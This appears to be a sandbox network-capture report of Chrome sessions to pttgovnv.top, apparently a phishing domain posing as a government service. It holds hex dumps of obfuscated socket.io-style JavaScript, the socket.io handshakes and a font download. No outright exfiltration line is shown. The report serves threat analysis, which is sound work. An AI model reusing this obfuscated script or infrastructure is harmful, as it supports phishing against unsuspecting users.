          Data Ascii: >typeof ArrayBuffer[a1_0x54146a(0x31d)]==a1_0x54146a(0x387)?ArrayBuffer['isView'](_0x215afd):_0x215afd&&_0x215afd[a1_0x54146a(0x162)]instanceof ArrayBuffer,ee=({type:_0x2d87ab,data:_0x3b60e1},_0x4d0581,_0x46bab2)=>Ae&&_0x3b60e1 instanceof Blob?_0x4d0581?_
          2024-09-01 22:25:21 UTC1369INData Raw: 35 2c 21 30 78 31 2c 5f 30 78 35 31 33 35 39 65 3d 3e 7b 24 7c 7c 28 24 3d 6e 65 77 20 54 65 78 74 45 6e 63 6f 64 65 72 28 29 29 2c 5f 30 78 33 64 37 33 35 34 28 24 5b 27 65 6e 63 6f 64 65 27 5d 28 5f 30 78 35 31 33 35 39 65 29 29 3b 7d 29 3b 7d 63 6f 6e 73 74 20 75 65 3d 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 61 34 29 2b 27 4b 4c 4d 4e 4f 50 51 52 53 54 27 2b 27 55 56 57 58 59 5a 61 62 63 64 27 2b 27 65 66 67 68 69 6a 6b 6c 6d 6e 27 2b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 62 61 29 2b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 33 62 29 2b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 31 32 29 2c 78 3d 74 79 70 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 3e 27 75 27 3f 5b 5d 3a 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 30 78 31 30 30 29 3b
          Data Ascii: 5,!0x1,_0x51359e=>{$||($=new TextEncoder()),_0x3d7354($['encode'](_0x51359e));});}const ue=a1_0x54146a(0x2a4)+'KLMNOPQRST'+'UVWXYZabcd'+'efghijklmn'+a1_0x54146a(0x2ba)+a1_0x54146a(0x23b)+a1_0x54146a(0x212),x=typeof Uint8Array>'u'?[]:new Uint8Array(0x100);
          2024-09-01 22:25:21 UTC1369INData Raw: 5f 30 78 37 62 62 31 33 33 29 7d 3b 63 6f 6e 73 74 20 5f 30 78 37 31 36 30 31 36 3d 5f 30 78 33 36 61 39 39 62 5b 5f 30 78 31 37 65 38 35 30 28 30 78 33 32 32 29 5d 28 30 78 30 29 3b 72 65 74 75 72 6e 20 5f 30 78 37 31 36 30 31 36 3d 3d 3d 27 62 27 3f 7b 27 74 79 70 65 27 3a 27 6d 65 73 73 61 67 65 27 2c 27 64 61 74 61 27 3a 4b 65 28 5f 30 78 33 36 61 39 39 62 5b 27 73 75 62 73 74 72 69 6e 67 27 5d 28 30 78 31 29 2c 5f 30 78 37 62 62 31 33 33 29 7d 3a 49 5b 5f 30 78 37 31 36 30 31 36 5d 3f 5f 30 78 33 36 61 39 39 62 5b 5f 30 78 31 37 65 38 35 30 28 30 78 33 31 34 29 5d 3e 30 78 31 3f 7b 27 74 79 70 65 27 3a 49 5b 5f 30 78 37 31 36 30 31 36 5d 2c 27 64 61 74 61 27 3a 5f 30 78 33 36 61 39 39 62 5b 27 73 75 62 73 74 72 69 6e 67 27 5d 28 30 78 31 29 7d 3a 7b
          Data Ascii: _0x7bb133)};const _0x716016=_0x36a99b[_0x17e850(0x322)](0x0);return _0x716016==='b'?{'type':'message','data':Ke(_0x36a99b['substring'](0x1),_0x7bb133)}:I[_0x716016]?_0x36a99b[_0x17e850(0x314)]>0x1?{'type':I[_0x716016],'data':_0x36a99b['substring'](0x1)}:{
          2024-09-01 22:25:21 UTC1369INData Raw: 72 65 61 6b 3b 7d 72 65 74 75 72 6e 20 5f 30 78 61 64 63 30 37 65 3b 7d 3b 66 75 6e 63 74 69 6f 6e 20 58 65 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 54 72 61 6e 73 66 6f 72 6d 53 74 72 65 61 6d 28 7b 27 74 72 61 6e 73 66 6f 72 6d 27 28 5f 30 78 33 63 63 34 66 31 2c 5f 30 78 34 63 30 31 38 39 29 7b 48 65 28 5f 30 78 33 63 63 34 66 31 2c 5f 30 78 34 37 33 36 35 38 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 34 37 34 65 65 37 3d 61 31 5f 30 78 31 61 33 33 2c 5f 30 78 34 31 36 37 31 30 3d 5f 30 78 34 37 33 36 35 38 5b 5f 30 78 34 37 34 65 65 37 28 30 78 33 31 34 29 5d 3b 6c 65 74 20 5f 30 78 31 62 65 35 38 32 3b 69 66 28 5f 30 78 34 31 36 37 31 30 3c 30 78 37 65 29 5f 30 78 31 62 65 35 38 32 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 30 78 31 29 2c 6e 65 77 20
          Data Ascii: reak;}return _0xadc07e;};function Xe(){return new TransformStream({'transform'(_0x3cc4f1,_0x4c0189){He(_0x3cc4f1,_0x473658=>{const _0x474ee7=a1_0x1a33,_0x416710=_0x473658[_0x474ee7(0x314)];let _0x1be582;if(_0x416710<0x7e)_0x1be582=new Uint8Array(0x1),new
          2024-09-01 22:25:21 UTC1369INData Raw: 3d 3d 3d 5f 30 78 31 32 32 31 30 65 5b 30 78 30 5d 5b 5f 30 78 31 33 34 33 34 37 28 30 78 33 31 34 29 5d 26 26 28 5f 30 78 31 32 32 31 30 65 5b 5f 30 78 31 33 34 33 34 37 28 30 78 32 65 31 29 5d 28 29 2c 5f 30 78 33 66 33 30 38 30 3d 30 78 30 29 3b 72 65 74 75 72 6e 20 5f 30 78 31 32 32 31 30 65 5b 27 6c 65 6e 67 74 68 27 5d 26 26 5f 30 78 33 66 33 30 38 30 3c 5f 30 78 31 32 32 31 30 65 5b 30 78 30 5d 5b 5f 30 78 31 33 34 33 34 37 28 30 78 33 31 34 29 5d 26 26 28 5f 30 78 31 32 32 31 30 65 5b 30 78 30 5d 3d 5f 30 78 31 32 32 31 30 65 5b 30 78 30 5d 5b 5f 30 78 31 33 34 33 34 37 28 30 78 32 66 65 29 5d 28 5f 30 78 33 66 33 30 38 30 29 29 2c 5f 30 78 34 36 37 36 32 30 3b 7d 66 75 6e 63 74 69 6f 6e 20 51 65 28 5f 30 78 31 36 63 34 34 39 2c 5f 30 78 64 39 62
          Data Ascii: ===_0x12210e[0x0][_0x134347(0x314)]&&(_0x12210e[_0x134347(0x2e1)](),_0x3f3080=0x0);return _0x12210e['length']&&_0x3f3080<_0x12210e[0x0][_0x134347(0x314)]&&(_0x12210e[0x0]=_0x12210e[0x0][_0x134347(0x2fe)](_0x3f3080)),_0x467620;}function Qe(_0x16c449,_0xd9b
          2024-09-01 22:25:21 UTC1369INData Raw: 31 29 62 72 65 61 6b 3b 63 6f 6e 73 74 20 5f 30 78 35 33 66 66 33 31 3d 44 28 5f 30 78 31 65 65 35 63 38 2c 5f 30 78 31 30 38 31 35 31 29 3b 5f 30 78 32 62 62 61 35 32 5b 5f 30 78 35 32 35 39 66 62 28 30 78 33 38 64 29 5d 28 74 65 28 5f 30 78 35 34 34 33 61 64 3f 5f 30 78 35 33 66 66 33 31 3a 6a 5b 5f 30 78 35 32 35 39 66 62 28 30 78 33 38 33 29 5d 28 5f 30 78 35 33 66 66 33 31 29 2c 5f 30 78 64 39 62 39 33 29 29 2c 5f 30 78 34 61 65 32 64 39 3d 30 78 30 3b 7d 7d 7d 69 66 28 5f 30 78 31 30 38 31 35 31 3d 3d 3d 30 78 30 7c 7c 5f 30 78 31 30 38 31 35 31 3e 5f 30 78 31 36 63 34 34 39 29 7b 5f 30 78 32 62 62 61 35 32 5b 5f 30 78 35 32 35 39 66 62 28 30 78 33 38 64 29 5d 28 57 29 3b 62 72 65 61 6b 3b 7d 7d 7d 7d 29 3b 7d 63 6f 6e 73 74 20 78 65 3d 30 78 34 3b
          Data Ascii: 1)break;const _0x53ff31=D(_0x1ee5c8,_0x108151);_0x2bba52[_0x5259fb(0x38d)](te(_0x5443ad?_0x53ff31:j[_0x5259fb(0x383)](_0x53ff31),_0xd9b93)),_0x4ae2d9=0x0;}}}if(_0x108151===0x0||_0x108151>_0x16c449){_0x2bba52[_0x5259fb(0x38d)](W);break;}}}});}const xe=0x4;
          2024-09-01 22:25:21 UTC1369INData Raw: 72 67 75 6d 65 6e 74 73 5b 5f 30 78 33 63 64 39 33 36 28 30 78 33 31 34 29 5d 3d 3d 30 78 30 29 72 65 74 75 72 6e 20 74 68 69 73 5b 5f 30 78 33 63 64 39 33 36 28 30 78 32 31 30 29 5d 3d 7b 7d 2c 74 68 69 73 3b 76 61 72 20 5f 30 78 35 39 36 35 35 36 3d 74 68 69 73 5b 5f 30 78 33 63 64 39 33 36 28 30 78 32 31 30 29 5d 5b 27 24 27 2b 5f 30 78 33 64 34 63 65 35 5d 3b 69 66 28 21 5f 30 78 35 39 36 35 35 36 29 72 65 74 75 72 6e 20 74 68 69 73 3b 69 66 28 61 72 67 75 6d 65 6e 74 73 5b 5f 30 78 33 63 64 39 33 36 28 30 78 33 31 34 29 5d 3d 3d 30 78 31 29 72 65 74 75 72 6e 20 64 65 6c 65 74 65 20 74 68 69 73 5b 5f 30 78 33 63 64 39 33 36 28 30 78 32 31 30 29 5d 5b 27 24 27 2b 5f 30 78 33 64 34 63 65 35 5d 2c 74 68 69 73 3b 66 6f 72 28 76 61 72 20 5f 30 78 33 38 32
          Data Ascii: rguments[_0x3cd936(0x314)]==0x0)return this[_0x3cd936(0x210)]={},this;var _0x596556=this[_0x3cd936(0x210)]['$'+_0x3d4ce5];if(!_0x596556)return this;if(arguments[_0x3cd936(0x314)]==0x1)return delete this[_0x3cd936(0x210)]['$'+_0x3d4ce5],this;for(var _0x382
          2024-09-01 22:25:21 UTC1369INData Raw: 32 31 30 29 5d 5b 27 24 27 2b 5f 30 78 31 66 35 63 30 35 5d 7c 7c 5b 5d 3b 7d 2c 6c 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 65 36 29 5d 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 33 33 36 29 2b 27 72 73 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 36 31 34 32 34 29 7b 63 6f 6e 73 74 20 5f 30 78 34 35 31 65 63 39 3d 61 31 5f 30 78 35 34 31 34 36 61 3b 72 65 74 75 72 6e 21 21 74 68 69 73 5b 5f 30 78 34 35 31 65 63 39 28 30 78 31 33 39 29 5d 28 5f 30 78 33 36 31 34 32 34 29 5b 5f 30 78 34 35 31 65 63 39 28 30 78 33 31 34 29 5d 3b 7d 3b 63 6f 6e 73 74 20 67 3d 28 28 28 29 3d 3e 74 79 70 65 6f 66 20 73 65 6c 66 3c 27 75 27 3f 73 65 6c 66 3a 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3c 27 75 27 3f 77 69 6e 64 6f 77 3a 46 75 6e 63 74 69 6f 6e 28 61 31
          Data Ascii: 210)]['$'+_0x1f5c05]||[];},l[a1_0x54146a(0x2e6)][a1_0x54146a(0x336)+'rs']=function(_0x361424){const _0x451ec9=a1_0x54146a;return!!this[_0x451ec9(0x139)](_0x361424)[_0x451ec9(0x314)];};const g=((()=>typeof self<'u'?self:typeof window<'u'?window:Function(a1


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          33192.168.2.449775104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:22 UTC380OUTGET /socket.io/?EIO=4&transport=polling&t=P6liL4Q HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:23 UTC621INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:23 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 118
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EUGi%2BDt27uu48qduMyrRSrGUEGlBHqt40FJS1y2CjV508BkLUEZyNKyJceKtc8GfTcY88v6PoIZ3HjlwNNtcFLuF1QLj2t%2FKQ0r6CeW3%2ByqVlaSxnvS9a5sBhXjVxQQ%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad077b3d7d0b-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:23 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 5f 33 71 55 41 72 47 5f 74 32 74 4e 4e 37 48 38 42 51 55 43 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
          Data Ascii: 0{"sid":"_3qUArG_t2tNN7H8BQUC","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          34192.168.2.449773172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:22 UTC549OUTGET /socket.io/?EIO=4&transport=websocket&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1
          Host: pttgovnv.top
          Connection: Upgrade
          Pragma: no-cache
          Cache-Control: no-cache
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Upgrade: websocket
          Origin: https://pttgovnv.top
          Sec-WebSocket-Version: 13
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          Sec-WebSocket-Key: zzXQZkQ66b3Ce9lg/lVchw==
          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
          2024-09-01 22:25:23 UTC603INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:23 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WVFbAh1afaToiABF3dh2NT7wPGaes3YUXSM5F4IXFP1gkTuDzf08stp9imSl%2BT%2F8iWWtlJNNYoKkLV8ZhKJssY5C%2BrKqL57rj8IEJL1XJ6y5caaMcCtAa8rqSd8unE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad077f335e68-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:23 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
          Data Ascii: 22{"code":3,"message":"Bad request"}
          2024-09-01 22:25:23 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          35192.168.2.449778172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:22 UTC701OUTGET /help/frames/0/index.html HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          sec-ch-ua-platform: "Windows"
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: navigate
          Sec-Fetch-Dest: iframe
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:23 UTC567INHTTP/1.1 404 Not Found
          Date: Sun, 01 Sep 2024 22:25:23 GMT
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=emElkeRRZK21yLNyJa3hGI1AK9u2d2wmhxqVFogHZiYS48YFVzcUrVM%2FfHUOziVBSjbgJTFn4WoT0mcOd6uECWskmd%2FeFaS3VmqmiKznBONtfEPSbvqgHpHhIB1Zy0g%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad079c840cba-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:23 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          36192.168.2.449780172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:22 UTC593OUTGET /help/assets/8560f9bdkFGym.woff HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Origin: https://pttgovnv.top
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: font
          Referer: https://pttgovnv.top/help/assets/2dd339f2kFGym.css
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:23 UTC732INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:23 GMT
          Content-Type: font/woff
          Content-Length: 62844
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"f57c-18fc3d84650"
          CF-Cache-Status: HIT
          Age: 36231
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C61Vz%2BTwVZQfcNKrrGJA%2BNKgmfVFNnMX7%2BagiazO2T2E77hPb1dga7Tmp1qv6jN5fRID4TytOUvJCgEkdS5Cev1o%2B%2BjudgGrAcnADEX6ttG%2B0B6A6ylWaJbzzN%2BwbnE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad077c10195d-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:23 UTC637INData Raw: 77 4f 46 46 00 01 00 00 00 00 f5 7c 00 12 00 00 00 01 a3 c4 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 46 54 4d 00 00 01 94 00 00 00 1c 00 00 00 1c 5d d2 28 5a 47 44 45 46 00 00 01 b0 00 00 00 1e 00 00 00 20 03 de 00 03 47 50 4f 53 00 00 01 d0 00 00 00 20 00 00 00 20 6c 91 74 8f 47 53 55 42 00 00 01 f0 00 00 01 bf 00 00 02 8a 48 8f b8 db 4f 53 2f 32 00 00 03 b0 00 00 00 5e 00 00 00 60 a0 cd 9b 5d 63 6d 61 70 00 00 04 10 00 00 03 22 00 00 04 7e cd 2a 1c 8d 63 76 74 20 00 00 07 34 00 00 00 34 00 00 00 34 06 91 09 86 66 70 67 6d 00 00 07 68 00 00 01 b1 00 00 02 65 0f b4 2f a7 67 61 73 70 00 00 09 1c 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 09 24 00 00 cc d5 00 01 5f 20 ee d2 69 30 68 65 61 64 00 00 d5 fc 00 00 00
          Data Ascii: wOFF|FFTM](ZGDEF GPOS ltGSUBHOS/2^`]cmap"~*cvt 444fpgmhe/gaspglyf$_ i0head
          2024-09-01 22:25:23 UTC1369INData Raw: d5 71 5c 72 2b 57 5d 0c 56 b4 3d 74 43 e3 88 57 72 7d 14 3d ef 7c 1f 46 05 2f a0 2c 78 11 be af a3 77 4c c5 56 bf 88 c1 76 41 cb f4 d0 a7 36 73 d2 d6 5f d6 af c6 96 4f cf 61 a3 03 5d e8 46 2f 32 e8 c7 00 0a 18 46 31 d0 0e 05 3c 1a f0 87 80 3f 06 fc 2d e0 1f 01 37 02 3e 6c b1 4a 98 19 94 4a 49 af 18 42 7c cb 77 7c cf 6d ee 48 3c 84 41 7c c1 3e 0e f0 55 a2 bd 48 70 82 93 9c e2 34 67 38 cb bb bc c7 39 de e7 3c 17 b8 c8 07 7c c8 47 7c ca 67 7c ce 17 92 9b 40 0f 96 b1 82 c7 78 82 ef d2 fd 27 7e e1 37 1a ea ba aa a9 79 b5 ab f6 ac b2 35 61 35 ac 3f a2 0d 73 45 ea 2b c4 d1 69 ee 9c 82 cd 97 5c e3 3a 37 b8 c9 57 7c cd 37 dc e2 aa d9 5a 5c 1e 20 29 4a c5 3a eb b2 5b 9d bf 64 f6 95 d0 f6 d1 4d 5d 4b f2 b7 cc 3d c3 47 9e 8e 89 d2 d4 45 5c ac a4 ec f3 24 4e e1 b4 78
          Data Ascii: q\r+W]V=tCWr}=|F/,xwLVvA6s_Oa]F/2F1<?-7>lJJIB|w|mH<A|>UHp4g89<|G|g|@x'~7y5a5?sE+i\:7W|7Z\ )J:[dM]K=GE\$Nx
          2024-09-01 22:25:23 UTC1369INData Raw: 2d 36 33 7a e5 ba 7d bf 8f c1 66 34 e5 4e 1a 40 79 cf 5b ca 43 46 d3 4e a0 16 ed b9 7f 32 3f 83 e1 3e ff cb 3c 07 83 96 66 9a 9e 5a 67 21 3d 84 c0 7c 33 6e 69 f0 35 a3 59 77 fd 41 5f b1 3a 5c 0d 06 86 14 d3 54 dc f5 c7 54 ca ff 96 e6 5c 6d 19 b6 36 33 9a 77 70 21 22 3f 98 06 68 6a ad 8d 40 d3 9f 3a a4 7a 3e 8e 62 09 72 f9 6c ac 0d 26 a6 ac 3f c9 44 70 61 32 5d d5 54 2d 33 be 76 70 9f ec 2c 3a d8 a4 4a 73 e0 01 0e b0 55 9e 82 87 e3 a3 09 85 f4 2d 89 32 4b 43 84 83 d8 2a 31 42 c4 24 87 42 4e 39 77 b2 3f 29 50 3e 92 84 31 6f 92 d2 ce b8 61 ad 81 71 e4 35 30 a8 cd d3 1c be cc 66 53 db 5b 87 30 7e 11 47 f0 dd 2f c6 92 0e 3e b2 a1 36 46 84 d8 8e 58 0a 60 02 91 90 51 55 be a1 c6 73 2f 8b 01 b9 d4 fe 33 10 25 60 79 fa ed 5f 27 02 ad 3b 36 11 2f 65 6d 9d 63 8c 15
          Data Ascii: -63z}f4N@y[CFN2?><fZg!=|3ni5YwA_:\TT\m63wp!"?hj@:z>brl&?Dpa2]T-3vp,:JsU-2KC*1B$BN9w?)P>1oaq50fS[0~G/>6FX`QUs/3%`y_';6/emc
          2024-09-01 22:25:23 UTC1369INData Raw: 87 e4 cc dc 14 f8 c0 a9 d6 8b e0 53 9a bf a0 0b 7e e5 01 00 46 ec 8a 54 5a 0a 10 73 f7 ec 15 0a 26 01 80 02 39 f9 25 9e a4 50 50 e9 99 1f c8 91 dc 24 64 25 7f fa 4a 86 6f e6 dc 7d e7 ea fb 36 ad 59 7e 6f 43 dd f8 43 13 eb c7 d7 6d 13 0a c7 b7 1e 23 3f 6e 58 bd f2 be 7b d6 dc b1 09 db 0f 8d af 13 f9 93 df fe f4 8f cf fe f5 d3 c7 fb 9f 27 f3 f7 3d f7 dc b9 81 48 f6 c8 9e 53 df fc 78 e2 b3 7f fd f2 e1 73 cf 91 b9 64 ce 5e 86 53 4b ce 9f 36 ad 30 1d 01 9c 2a 04 3a 71 23 17 49 41 ea 90 89 e4 30 17 c0 65 43 48 15 23 4c 2e a6 30 f1 3b 28 ea e0 31 ef 02 58 d4 45 a6 00 70 c0 a5 43 56 3d 78 cc 01 26 a5 f0 1e ec a2 b8 9e b5 09 99 b9 9d 64 ba 74 07 c0 41 f1 a5 16 20 ce 78 95 70 0a c0 a6 38 57 71 ed 31 3b 00 6e 9d 8a a0 99 82 a4 a4 a0 1b 60 88 be 7c 33 a0 4b 49 08 de
          Data Ascii: S~FTZs&9%PP$d%Jo}6Y~oCCm#?nX{'=HSxsd^SK60*:q#IA0eCH#L.0;(1XEpCV=x&dtA xp8Wq1;n`|3KI
          2024-09-01 22:25:23 UTC1369INData Raw: 0a 2b 20 c1 a8 16 60 b9 42 30 62 a1 a4 c0 22 c1 c6 58 a9 78 69 c5 8d 41 a6 63 b1 c2 22 65 40 8b 04 b6 41 78 1a 01 2f 42 de 00 e0 06 28 00 72 49 40 32 17 f2 c7 16 b7 b6 d6 47 57 f0 8b 9d 16 cf 14 32 ff 52 51 6a 75 d4 68 ab c9 fc 1a b2 8d 74 3b 92 77 2f ec c3 5a d8 07 19 f0 31 9d bb 81 8b a4 1a fb 40 f1 44 b1 b6 34 7b 6c a9 4e d8 07 8f 05 f6 21 83 ee 83 0f b4 8d 4c 26 c1 96 bf 7c 76 0e 15 5c 9d dd 9c 61 c7 41 13 a0 d3 1f ce b0 eb 20 a7 3a 5c dd ba 91 26 87 53 71 e9 72 23 51 7d 66 40 e6 44 99 0a 56 a9 6c 8f 6c 4a 84 d8 7d 17 ec 09 e2 95 1b 25 4a 40 2e 11 b6 01 f8 e0 da 19 4f 5c 7d f0 9b cf 5e be f5 ae be bd f9 83 d1 ad 5d b7 d4 7e 4b 1c da 37 bf cd 7c a5 7c 4a 49 e1 db 4f 3f ba bf a0 80 7f 70 7c b4 35 e3 b3 d7 4e 9d 2d 44 1d 60 19 ac 2b 00 34 20 19 e4 a2 06
          Data Ascii: + `B0b"XxiAc"e@Ax/B(rI@2GW2RQjuht;w/Z1@D4{lN!L&|v\aA :\&Sqr#Q}f@DVllJ}%J@.O\}^]~K7||JIO?p|5N-D`+4
          2024-09-01 22:25:23 UTC1369INData Raw: 47 e0 9b ec 34 82 90 99 73 82 ac 39 fb 01 19 d2 f4 ec e6 31 b3 41 e8 dd 36 e3 9e 6d 3f bd bc ea 9e a4 81 23 a7 2c db aa 7d 74 e0 2b ed 91 17 48 25 09 8d 7b e9 8e b7 df d7 1e d5 ae e7 2d b3 16 72 e7 5d f2 f0 b9 1b c3 a0 c1 70 e4 fe cf 22 da b3 1f 7e a1 9d 9e 31 6e d2 e4 43 bb df 22 a4 b3 d6 3d 73 ea 35 2d cf bf 4c 72 1f 7c 5d bb e7 b4 f6 a2 f6 48 6e cf 89 23 c8 3a 72 eb da bb 49 1d 09 a4 1d 41 58 c2 3f f1 88 e9 00 60 a5 93 eb c2 a4 b7 b0 10 a2 04 be 59 b2 70 04 c8 91 84 94 19 0e 94 4c e9 bc 05 80 61 87 65 f7 00 49 38 20 f8 05 b7 5f c8 2f 90 cc fc d0 4b f8 8a 79 6f 47 77 bf f3 13 9f f0 7a 4a 20 2d db 74 e0 ec 00 5e 8c b6 f2 e3 f9 c4 7e b3 c6 57 32 9d f8 28 dc 6f 1d f0 92 44 2e 09 f0 73 8a 2e 2f ca a2 6e 75 cc 02 2a e8 4b a2 b7 f5 e1 6d b3 e9 9e c9 b0 51 be
          Data Ascii: G4s91A6m?#,}t+H%{-r]p"~1nC"=s5-Lr|]Hn#:rIAX?`YpLaeI8 _/KyoGwzJ -t^~W2(oD.s./nu*KmQ
          2024-09-01 22:25:23 UTC1369INData Raw: 77 8c c2 d9 82 48 e1 01 3b 55 11 66 ee 41 2c 75 a1 89 47 d4 29 bc e2 11 fd 81 94 98 99 e2 28 69 e4 6d 20 d9 9f f9 ec cd df 3f fe db 87 40 04 b4 b1 ff f7 59 74 3b df fc e8 de 27 1f c5 39 dc a2 6d a7 30 93 41 93 1f ca 45 9c 08 33 0f c0 8c 1a 1d 28 e0 52 6d 4c 87 87 19 28 00 38 45 56 7d 3a e0 40 9d 57 7d c0 fa 9a 04 9b c3 4a c5 ab 54 cf 9f 60 c7 9b f1 cc 04 fe 02 80 ad 27 c9 b0 1d da 57 fe ac ff 06 c5 0f b5 a5 bd b4 ed 64 30 ff 1f 60 b9 01 60 e9 00 ee 7d 55 7b 2c 54 93 00 9c 76 27 05 a7 bd 8d 7b 83 ca 19 76 06 d1 1e ef d2 19 66 32 22 82 03 56 90 00 f2 07 12 16 1b 2c c9 09 98 11 b6 20 15 8f b1 51 91 da dc 03 c4 9f 42 fc 31 40 8f 25 32 11 37 6f 25 6b ae d7 56 68 1b 89 ef b9 77 de f8 0c e0 fd e6 5b 1b de ea 12 6d e4 6f 8c 2e e3 8f 3d f6 c8 e3 f7 a1 ec 0f 32 fd
          Data Ascii: wH;UfA,uG)(im ?@Yt;'9m0AE3(RmL(8EV}:@W}JT`'Wd0``}U{,Tv'{vf2"V, QB1@%27o%kVhw[mo.=2
